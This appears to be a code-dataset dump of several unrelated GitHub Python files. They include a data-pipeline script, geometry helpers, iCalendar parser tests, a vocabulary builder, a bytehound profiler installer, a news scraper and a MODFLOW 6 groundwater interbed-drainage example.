order = get_order()\n status = get_status()\n restaurant = get_restaurant()\n consumer = get_consumer()\n last_status = get_last_status(status)\n LOG.info(f\"Merging dataframes\")\n order = order.merge(last_status, how='left', on='order_id')\n order = order.merge(restaurant, how='left', on='merchant_id')\n order = order.merge(consumer, how='left', on='customer_id')\n order = update_local_date(order, ['AM','RR','RO','MT','MS'], td(hours=1))\n order = update_local_date(order, ['AC'], td(hours=2))\n anonymize_columns(order, ['customer_name', 'customer_phone_number', 'cpf', 'delivery_address_latitude', 'delivery_address_longitude', 'delivery_address_zip_code'])\n write_dataset_with_partition(order, 'order_local_created_at', 'orders')\n\nif __name__=='__main__':\n LOG.info(f\"Starting to create orders_dataset\")\n orders_dataset()\n","repo_name":"PedroAugustoAlvesNunes/ifood_DArch_case","sub_path":"create_orders.py","file_name":"create_orders.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42456760173","text":"import math\n\nINVALID_DISTANCE = -1\n\ndef distance(p1, p2):\n dx = p1[0]-p2[0]\n dy = p1[1]-p2[1]\n return math.sqrt(dx*dx + dy*dy)\n\n\ndef lineOffsetWithMinimumDistanceToPoint(point, line_start, line_end, perpendicular=False):\n \"\"\"Return the offset from line (line_start, line_end) where the distance to\n point is minimal\"\"\"\n p = point\n p1 = line_start\n p2 = line_end\n l = distance(p1, p2)\n u = (((p[0] - p1[0]) * (p2[0] - p1[0])) + ((p[1] - p1[1]) * (p2[1] - p1[1]))) / (l * l)\n if u < 0.0 or u > 1:\n if perpendicular:\n return INVALID_DISTANCE\n if u < 0:\n return 0\n return l\n return u * l\n\n\ndef polygonOffsetWithMinimumDistanceToPoint(point, polygon):\n \"\"\"Return the offset from the polygon start where the distance to point is minimal\"\"\"\n p = point\n s = polygon\n o = 0\n for i in range(0, len(s)-1):\n q = lineOffsetWithMinimumDistanceToPoint(p, s[i], s[i+1], True)\n if q!=-1:\n return o+q\n o = o + distance(s[i], s[i+1])\n return -1\n\n\ndef distancePointToLine(point, line_start, line_end, perpendicular=False):\n \"\"\"Return the minimum distance between point and the line (line_start, line_end)\"\"\"\n p1 = line_start\n p2 = line_end\n u = lineOffsetWithMinimumDistanceToPoint(point, line_start, line_end, perpendicular)\n if u == INVALID_DISTANCE: \n return INVALID_DISTANCE\n intersection = (p1[0] + u*(p2[0]-p1[0]), p1[1] + u*(p2[1]-p1[1]))\n return distance(point, intersection)\n\n\ndef distancePointToPolygon(point, polygon, perpendicular=True):\n \"\"\"Return the minimum distance between point and polygon\"\"\"\n p = point\n s = polygon\n minDist = None\n for i in range(0, len(s)-1):\n dist = distancePointToLine(p, s[i], s[i+1], perpendicular)\n if dist != INVALID_DISTANCE:\n if minDist is None or dist < minDist:\n minDist = dist\n if minDist is not None:\n return minDist\n else:\n return INVALID_DISTANCE\n\n\n","repo_name":"intrig-unicamp/mininet-wifi","sub_path":"mn_wifi/sumo/sumolib/geomhelper.py","file_name":"geomhelper.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":391,"dataset":"github-code","pt":"32"} +{"seq_id":"26268525878","text":"import unittest\nimport datetime\nimport cal\n\ndef tzdetails_from_dict(values):\n tzdetails = cal.TZDetails(values['kind'])\n tzdetails.name = values['name']\n tzdetails.parseline('DTSTART:%s' % values['start'])\n tzdetails.parseline('TZOFFSETFROM:%s' % values['offsetfrom'])\n tzdetails.parseline('TZOFFSETTO:%s' % values['offsetto'])\n return tzdetails\n\ndef create_parametrized_value(params, value):\n parametrized = cal.ParametrizedValue('')\n parametrized.params = params\n parametrized.value = value\n return parametrized\n\ndef create_email(ical):\n mail = '\\r\\n'.join(['Mime-Version: 1.0',\n 'X-Mailer: GroupWise 2012',\n 'Subject: Title',\n 'Date: Wed, 15 Jan 2014 14:46:00 +0000',\n 'Message-ID: ',\n 'From: \"Joe Hacker\" ',\n 'To: Bob Hacker ',\n 'Content-Type: text/calendar',\n '',\n ical])\n return mail\n\ndef load_from_file(path):\n fdescr = open(path, 'r')\n content = fdescr.read()\n fdescr.close()\n return content\n\nclass CalendarTest(unittest.TestCase):\n\n def test_timezone_utcoffset(self):\n tz = cal.Timezone()\n tz.tzid = 'Some id'\n tz.changes = [ tzdetails_from_dict({'kind': 'DAYLIGHT', 'name': 'CEST',\n 'start': '20130331T020000', 'offsetfrom': '+0100',\n 'offsetto': '+0200'}),\n tzdetails_from_dict({'kind': 'STANDARD', 'name': 'CET',\n 'start': '20131027T030000', 'offsetfrom': '+0200',\n 'offsetto': '+0100'}) ]\n dt = datetime.datetime(2013, 10, 8, 13, 0, 0)\n utc = dt - tz.utcoffset(dt)\n self.assertEqual(utc.strftime('%Y%m%dT%H%M%SZ'), '20131008T110000Z')\n\n def test_parse_vtimezone_simple(self):\n data = ['TZID:/freeassociation.sourceforge.net/Tzfile/Europe/Paris',\n 'X-LIC-LOCATION:Europe/Paris',\n 'BEGIN:DAYLIGHT',\n 'TZNAME:CEST',\n 'DTSTART:20130331T020000',\n 'TZOFFSETFROM:+0100',\n 'TZOFFSETTO:+0200',\n 'END:DAYLIGHT',\n 'BEGIN:STANDARD',\n 'TZNAME:CET',\n 'DTSTART:20131027T030000',\n 'TZOFFSETFROM:+0200',\n 'TZOFFSETTO:+0100',\n 'END:STANDARD']\n\n tz = cal.Timezone()\n for line in data:\n tz.parseline(line)\n\n expected_changes = [ tzdetails_from_dict({'kind': 'DAYLIGHT', 'name': 'CEST',\n 'start': '20130331T020000', 'offsetfrom': '+0100',\n 'offsetto': '+0200'}),\n tzdetails_from_dict({'kind': 'STANDARD', 'name': 'CET',\n 'start': '20131027T030000', 'offsetfrom': '+0200',\n 'offsetto': '+0100'}) ]\n self.assertEqual(tz.changes, expected_changes)\n self.assertEqual(tz.tzid, '/freeassociation.sourceforge.net/Tzfile/Europe/Paris'.lower())\n\n def test_timezone_rrule(self):\n data = ['TZID:Mountain Standard Time',\n 'BEGIN:STANDARD',\n 'TZOFFSETFROM:-0600',\n 'TZOFFSETTO:-0700',\n 'DTSTART:20001102T020000',\n 'RRULE:FREQ=YEARLY;BYDAY=1SU;BYMONTH=11',\n 'TZNAME:Mountain Standard Time',\n 'END:STANDARD',\n 'BEGIN:DAYLIGHT',\n 'TZOFFSETFROM:-0700',\n 'TZOFFSETTO:-0600',\n 'DTSTART:20000309T020000',\n 'RRULE:FREQ=YEARLY;BYDAY=2SU;BYMONTH=3',\n 'TZNAME:Mountain Daylight Time',\n 'END:DAYLIGHT']\n tested = cal.Timezone()\n for line in data:\n tested.parseline(line)\n\n # Test winter offset\n actual = tested.utcoffset(datetime.datetime(2014, 1, 21, 9, 0, 0))\n self.assertEqual(actual, datetime.timedelta(hours=-7))\n\n # Test summer offset\n actual = tested.utcoffset(datetime.datetime(2014, 6, 21, 9, 0, 0))\n self.assertEqual(actual, datetime.timedelta(hours=-6))\n\n def test_parametrized_values_equals(self):\n parametrized_values1 = [ create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'ACCEPTED', 'RSVP': 'TRUE', \\\n 'CN': 'Joe HACKER', 'LANGUAGE': 'en'}, 'MAILTO:joe@hacker.com' ),\n create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'NEEDS-ACTION', 'RSVP': 'TRUE', \\\n 'LANGUAGE': 'en'}, 'MAILTO:alice@hacker.com' ) ]\n parametrized_values2 = [ create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'NEEDS-ACTION', 'RSVP': 'TRUE', \\\n 'LANGUAGE': 'en'}, 'MAILTO:alice@hacker.com' ),\n create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'ACCEPTED', 'RSVP': 'TRUE', \\\n 'CN': 'Joe HACKER', 'LANGUAGE': 'en'}, 'MAILTO:joe@hacker.com' ) ]\n self.assertTrue( len(set(parametrized_values1) ^ set(parametrized_values2)) == 0 )\n\n def test_parse_event(self):\n data = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:20131007T194020Z-3587-100-1732-0@laptop',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Joe HACKER;LANGUAGE=en:MAILTO:',\n ' joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n parsed = cal.Calendar(create_email(data))\n\n expected_event = cal.Event(None)\n expected_event.uid = '20131007T194020Z-3587-100-1732-0@laptop'\n expected_event.dtstamp = '20131007T194119Z' # dtstamp should always be a datetime in UTC\n expected_event.dtstart = ':20131008T130000Z'\n expected_event.dtend = ':20131008T133000Z'\n expected_event.summary = 'test summary'\n expected_event.location = 'test location'\n expected_event.description = 'test description'\n expected_event.organizer = create_parametrized_value( {'CN': 'Joe Hacker' }, 'MAILTO:joe@hacker.com' )\n expected_event.attendees = [ create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'ACCEPTED', 'RSVP': 'TRUE', \\\n 'CN': 'Joe HACKER', 'LANGUAGE': 'en'}, 'MAILTO:joe@hacker.com' ),\n create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'NEEDS-ACTION', 'RSVP': 'TRUE', \\\n 'LANGUAGE': 'en'}, 'MAILTO:alice@hacker.com' ) ]\n self.assertEqual(parsed.events[0], expected_event)\n\n def test_parse_mail_attachement(self):\n mail = load_from_file('tests/attach.eml')\n files = {}\n def output_files(name, content):\n files[name] = content\n return 'file:///mockup/%s' % name\n\n tested = cal.Calendar(mail, output_files)\n tested_event = tested.events[0]\n\n expected_name = 'recordid/foo.txt'\n expected = create_parametrized_value({}, 'file:///mockup/%s' % expected_name)\n self.assertEqual(tested_event.attachments[0], expected)\n self.assertEqual(files[expected_name], 'some content')\n\n def test_calendar_diff_added(self):\n data_old = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:old-event-uid',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Joe HACKER;LANGUAGE=en:MAILTO:',\n ' joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n old = cal.Calendar(create_email(data_old))\n\n data_new = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:old-event-uid',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Joe HACKER;LANGUAGE=en:MAILTO:',\n ' joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'BEGIN:VEVENT',\n 'UID:added-event-uid',\n 'DTSTAMP:20131009T194119Z',\n 'DTSTART:20131010T130000Z',\n 'DTEND:20131010T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:added event summary',\n 'LOCATION:added event location',\n 'DESCRIPTION:added event description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:bob@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n new = cal.Calendar(create_email(data_new))\n\n (changed, removed, added, unchanged) = old.diff(new)\n\n self.assertEqual(len(changed), 0)\n self.assertEqual(len(removed), 0)\n self.assertEqual(added.keys()[0], 'added-event-uid')\n self.assertEqual(unchanged.keys()[0], 'old-event-uid')\n\n def test_calendar_diff_changed(self):\n data_old = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:changed-event-uid',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Joe HACKER;LANGUAGE=en:MAILTO:',\n ' joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n old = cal.Calendar(create_email(data_old))\n\n data_new = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:changed-event-uid',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Bob HACKER;LANGUAGE=en:MAILTO:', # Participant changed from\n ' bob@hacker.com', # Joe to Bob\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n new = cal.Calendar(create_email(data_new))\n\n (changed, removed, added, unchanged) = old.diff(new)\n\n self.assertEqual(len(unchanged), 0)\n self.assertEqual(len(removed), 0)\n self.assertEqual(len(added), 0)\n self.assertEqual(changed.keys()[0], 'changed-event-uid')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cbosdo/groupwise-ics","sub_path":"test-cal.py","file_name":"test-cal.py","file_ext":"py","file_size_in_byte":16306,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"5496593270","text":"import sys\nfrom pathlib import Path\n# To import upper level modules\nsys.path.append(str(Path('.').absolute().parent))\nfrom data_utils.vocabulary import Vocabulary\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--text_file', type=str, required=True)\nparser.add_argument('--model_file', type=str, required=True)\nparser.add_argument('--model_type', type=str, default=\"word\")\nparser.add_argument('--vocab_size', type=int, default=500000)\n\ndef main(opt):\n\n vocab = Vocabulary(opt.vocab_size)\n vocab.create_vocabulary_from_file(sp_text_file=opt.text_file, model_filename=opt.model_file, model_type=opt.model_type) \n\n# python3 extract_token_vocab.py --data_path ../../datasets/OJ_raw_small/ --node_token_vocab_model_prefix OJ_raw_token\n\nif __name__ == \"__main__\":\n opt = parser.parse_args()\n main(opt)\n","repo_name":"bdqnghi/infercode","sub_path":"infercode/script/build_vocab_from_file.py","file_name":"build_vocab_from_file.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"32"} +{"seq_id":"27574512719","text":"\n\nfrom machineconfig.utils.utils import get_latest_release\nimport crocodile.toolbox as tb\nfrom crocodile.meta import Terminal\nfrom typing import Optional\n\n\nurl = r\"https://github.com/koute/bytehound\"\nfname = r\"bytehound-x86_64-unknown-linux-gnu.tgz\"\n__doc__ = \"\"\"Inspecting the memory usage of a running process\"\"\"\n\n\ndef main(version: Optional[str] = None):\n release = get_latest_release(url, version=version)\n if not isinstance(release, tb.P): raise ValueError(f\"Failed to get latest release. Expected a Path object, got {release}\")\n downloaded = tb.P(release).joinpath(fname).download().ungz_untar(inplace=True)\n Terminal().run(f\"sudo mv {downloaded}/* /usr/local/bin/\").print_if_unsuccessful(desc=\"MOVING executable to /usr/local/bin\", strict_err=True, strict_returncode=True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"thisismygitrepo/machineconfig","sub_path":"src/machineconfig/jobs/python_linux_installers/dev/bytehound.py","file_name":"bytehound.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"458072626","text":"#!/usr/ bin/python\n# -*- coding: utf-8 -*-\n\nimport datetime\n\nimport scrapy\n\nimport locale\nimport datetime\n\n\nlocale.setlocale(locale.LC_ALL, \"es_AR.utf8\")\n\nBASE_URL = 'http://www.lacapitalmdp.com/'\n\nclass LaCapitalMdpSpider(scrapy.Spider):\n name = \"lacapitalmdp\"\n\n def start_requests(self):\n \n urls = [\n 'http://www.lacapitalmdp.com/categorias/el-pais/',\n 'http://www.lacapitalmdp.com/categorias/la-ciudad/'\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse_seccion)\n\n\n def parse_seccion(self, response):\n noticias = set(response.xpath('//div[@class=\"col-xs-12 col-sm-9 col-md-7 col-lg-7 posts_list\"]/div[@class=\"category_nota\"]/h2/a/@href').extract())\n \n for noticia in noticias:\n nota = response.urljoin(noticia)\n yield scrapy.Request(url=nota, callback=self.parse_noticia)\n\n\n def parse_noticia(self, response):\n \n try:\n fecha_texto = response.xpath('//div[@class=\"date_container\"]/text()').extract()[0].strip()\n noticia_fecha = datetime.datetime.strptime(fecha_texto, '%d de %B de %Y')\n except:\n noticia_fecha = datetime.datetime.now()\n \n try:\n noticia_teaser = response.xpath('//div[@class=\"bajada\"]/p/text()').extract()[0].strip()\n except:\n noticia_teaser = ''\n\n noticia_cuerpo = ' '.join([e for e in response.xpath('//div[@class=\"nota_content\"]/p//text()').extract()])\n\n data = {\n 'titulo': response.xpath('//div[@class=\"col-xs-12 col-sm-9 col-md-6 col-lg-7\"]/h1/text()').extract()[0].strip(),\n 'fecha': noticia_fecha,\n 'noticia_texto': noticia_teaser + ' ' + noticia_cuerpo,\n 'noticia_url': response.url,\n 'source': 'La Capital Mar del Plata',\n 'formato': 'web'\n }\n \n yield data\n \n \n","repo_name":"chequeado/chequeabot","sub_path":"news_collector/news_collector/spiders/lacapitalmdp.py","file_name":"lacapitalmdp.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"es","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"26745788369","text":"# ## Delay interbed drainage example\n#\n# This problem simulates the drainage of a thick interbed caused by a step\n# decrease in hydraulic head in the aquifer and is based on MODFLOW-2000 subsidence\n# package sample problem 1.\n\n# ### Initial setup\n#\n# Import dependencies, define the example name and workspace, and read settings from environment variables.\n\n# +\nimport os\nimport pathlib as pl\n\nimport flopy\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom flopy.plot.styles import styles\nfrom modflow_devtools.misc import get_env, timed\n\n# Example name and base workspace\nsim_name = \"ex-gwf-csub-p02\"\nworkspace = pl.Path(\"../examples\")\n\n# Settings from environment variables\nwrite = get_env(\"WRITE\", True)\nrun = get_env(\"RUN\", True)\nplot = get_env(\"PLOT\", True)\nplot_show = get_env(\"PLOT_SHOW\", True)\nplot_save = get_env(\"PLOT_SAVE\", True)\n\n# ### Define parameters\n#\n# Define model units, parameters and other settings.\n\n# +\n# Scenario-specific parameters\nparameters = {\n \"ex-gwf-csub-p02a\": {\n \"head_based\": True,\n \"bed_thickness\": (1.0,),\n \"kv\": (2.5e-06,),\n \"ndelaycells\": 19,\n },\n \"ex-gwf-csub-p02b\": {\n \"head_based\": False,\n \"bed_thickness\": (1.0,),\n \"kv\": (2.5e-06,),\n \"ndelaycells\": 19,\n },\n \"ex-gwf-csub-p02c\": {\n \"head_based\": True,\n \"bed_thickness\": (1.0, 2.0, 5.0, 10.0, 20.0, 50.0, 100.0),\n \"kv\": (2.5e-06, 1e-05, 6.25e-05, 0.00025, 0.001, 0.00625, 0.025),\n \"ndelaycells\": 1001,\n },\n}\n\n# Model units\nlength_units = \"meters\"\ntime_units = \"days\"\n\n# Model parameters\nnper = 1 # Number of periods\nnlay = 1 # Number of layers\nncol = 3 # Number of columns\nnrow = 1 # Number of rows\ndelr = 1.0 # Column width ($m$)\ndelc = 1.0 # Row width ($m$)\ntop = 0.0 # Top of the model ($ft$)\nbotm = -1000.0 # Layer bottom elevations ($m$)\nstrt = 0.0 # Starting head ($m$)\nicelltype = 0 # Cell conversion type\nk11 = 1.0e6 # Horizontal hydraulic conductivity ($m/d$)\nsgm = 1.7 # Specific gravity of moist soils (unitless)\nsgs = 2.0 # Specific gravity of saturated soils (unitless)\ntau0 = 1000.0 # Interbed drainage time constant (unitless)\ncg_theta = 0.2 # Coarse-grained material porosity (unitless)\nske = 1.0e-5 # Elastic specific storage ($1/m$)\nskv = 1.0e-2 # Inelastic specific storage ($1/m$)\ntheta = 0.45 # Interbed porosity (unitless)\nh0 = 1.0 # Initial interbed head ($m$)\nhead_offset = 1.0 # Initial preconsolidation head ($m$)\n\n# Time discretization\ntdis_ds = ((1000.0, 100, 1.05),)\n\n# Constant head cells\nc6 = []\nfor j in range(0, ncol, 2):\n c6.append([0, 0, j, strt])\n\n# Solver parameters\nnouter = 1000\nninner = 300\nhclose = 1e-9\nrclose = 1e-6\nlinaccel = \"bicgstab\"\nrelax = 0.97\n# -\n\n# ### Model setup\n#\n# Define functions to build models, write input files, and run the simulation.\n\n\n# +\ndef build_models(\n name,\n subdir_name=\".\",\n head_based=True,\n bed_thickness=1.0,\n kv=2e-6,\n ndelaycells=19,\n):\n sim_ws = os.path.join(workspace, name)\n if subdir_name is not None:\n sim_ws = os.path.join(sim_ws, subdir_name)\n sim = flopy.mf6.MFSimulation(sim_name=name, sim_ws=sim_ws, exe_name=\"mf6\")\n flopy.mf6.ModflowTdis(sim, nper=nper, perioddata=tdis_ds, time_units=time_units)\n flopy.mf6.ModflowIms(\n sim,\n outer_maximum=nouter,\n outer_dvclose=hclose,\n linear_acceleration=linaccel,\n inner_maximum=ninner,\n inner_dvclose=hclose,\n relaxation_factor=relax,\n rcloserecord=f\"{rclose} strict\",\n )\n gwf = flopy.mf6.ModflowGwf(\n sim, modelname=name, save_flows=True, newtonoptions=\"newton\"\n )\n flopy.mf6.ModflowGwfdis(\n gwf,\n length_units=length_units,\n nlay=nlay,\n nrow=nrow,\n ncol=ncol,\n delr=delr,\n delc=delc,\n top=top,\n botm=botm,\n )\n # gwf obs\n flopy.mf6.ModflowUtlobs(\n gwf,\n digits=10,\n print_input=True,\n continuous={\"gwf_obs.csv\": [(\"h1_1_2\", \"HEAD\", (0, 0, 1))]},\n )\n\n flopy.mf6.ModflowGwfic(gwf, strt=strt)\n flopy.mf6.ModflowGwfnpf(\n gwf,\n icelltype=icelltype,\n k=k11,\n save_specific_discharge=True,\n )\n flopy.mf6.ModflowGwfsto(gwf, iconvert=icelltype, ss=0.0, sy=0, transient={0: True})\n if head_based:\n hb_bool = True\n pc0 = head_offset\n tsgm = None\n tsgs = None\n else:\n hb_bool = None\n pc0 = -head_offset\n tsgm = sgm\n tsgs = sgs\n sub6 = [\n [\n 0,\n 0,\n 0,\n 1,\n \"delay\",\n pc0,\n bed_thickness,\n 1.0,\n skv,\n ske,\n theta,\n kv,\n h0,\n \"ib1\",\n ]\n ]\n csub = flopy.mf6.ModflowGwfcsub(\n gwf,\n print_input=True,\n save_flows=True,\n head_based=hb_bool,\n ndelaycells=ndelaycells,\n boundnames=True,\n ninterbeds=1,\n sgm=tsgm,\n sgs=tsgs,\n cg_theta=cg_theta,\n cg_ske_cr=0.0,\n beta=0.0,\n packagedata=sub6,\n )\n opth = f\"{name}.csub.obs\"\n csub_csv = opth + \".csv\"\n obs = [\n (\"tcomp\", \"interbed-compaction\", \"ib1\"),\n (\"sk\", \"sk\", \"ib1\"),\n (\"qtop\", \"delay-flowtop\", (0,)),\n (\"qbot\", \"delay-flowbot\", (0,)),\n ]\n for k in range(ndelaycells):\n tag = f\"H{k + 1:04d}\"\n obs.append((tag, \"delay-head\", (0,), (k,)))\n if not head_based:\n iposm = int(ndelaycells / 2) + 1\n iposb = ndelaycells - 1\n obs += [\n (\"est\", \"delay-estress\", (0,), (0,)),\n (\"esm\", \"delay-estress\", (0,), (iposm,)),\n (\"esb\", \"delay-estress\", (0,), (iposb,)),\n (\"gs\", \"gstress-cell\", (0, 0, 1)),\n (\"es\", \"estress-cell\", (0, 0, 1)),\n ]\n orecarray = {csub_csv: obs}\n csub.obs.initialize(\n filename=opth, digits=10, print_input=True, continuous=orecarray\n )\n\n flopy.mf6.ModflowGwfchd(gwf, stress_period_data={0: c6})\n\n flopy.mf6.ModflowGwfoc(\n gwf,\n printrecord=[(\"BUDGET\", \"ALL\")],\n )\n return sim\n\n\ndef write_models(sim, silent=True):\n sim.write_simulation(silent=silent)\n\n\n@timed\ndef run_models(sim, silent=True):\n success, buff = sim.run_simulation(silent=silent)\n assert success, buff\n\n\n# -\n\n# ### Plotting results\n#\n# Define functions to plot model results, beginning with an analytical solution to superimpose over the simulated solution.\n\n\n# +\ndef analytical_solution(z, t, dh=1.0, b0=1.0, ssk=100.0, vk=0.025, n=100, silent=True):\n v = 0.0\n e = np.exp(1)\n pi = np.pi\n pi2 = np.pi**2\n # calculate infinite sum\n for k in range(n):\n fk = float(k)\n tauk = (0.5 * b0) ** 2.0 * ssk / ((2.0 * fk + 1.0) ** 2.0 * vk)\n ep = ((2.0 * fk + 1.0) ** 2 * pi2 * vk * t) / (4.0 * ssk * (0.5 * b0) ** 2.0)\n rad = (2.0 * fk + 1.0) * pi * z / b0\n v += ((-1.0) ** fk / (2.0 * fk + 1.0)) * (e**-ep) * np.cos(rad)\n if not silent:\n print(f\"{k:5d} {tauk:20g} {rad:20g} {v:20g}\")\n return dh - 4.0 * dh * v / pi\n\n\n# Set figure properties specific to the problem\nfigure_size = (6.8, 3.4)\narrow_props = dict(facecolor=\"black\", arrowstyle=\"-\", lw=0.5)\n\n\ndef plot_grid(sim, silent=True):\n with styles.USGSMap() as fs:\n name = sim.name\n gwf = sim.get_model(name)\n\n fig, ax = plt.subplots(figsize=(6.8, 2.0))\n mc = flopy.plot.PlotCrossSection(model=gwf, line={\"Row\": 0}, ax=ax)\n\n ax.fill_between([0, 1], y1=0, y2=botm, color=\"cyan\", alpha=0.5)\n styles.add_text(\n ax=ax,\n text=\"Constant head\",\n x=0.5,\n y=-500.0,\n bold=False,\n italic=False,\n transform=False,\n va=\"center\",\n ha=\"center\",\n fontsize=9,\n )\n ax.fill_between([2, 3], y1=0, y2=botm, color=\"cyan\", alpha=0.5)\n styles.add_text(\n ax=ax,\n text=\"Constant head\",\n x=2.5,\n y=-500.0,\n bold=False,\n italic=False,\n transform=False,\n va=\"center\",\n ha=\"center\",\n fontsize=9,\n )\n ax.fill_between([1, 2], y1=-499.5, y2=-500.5, 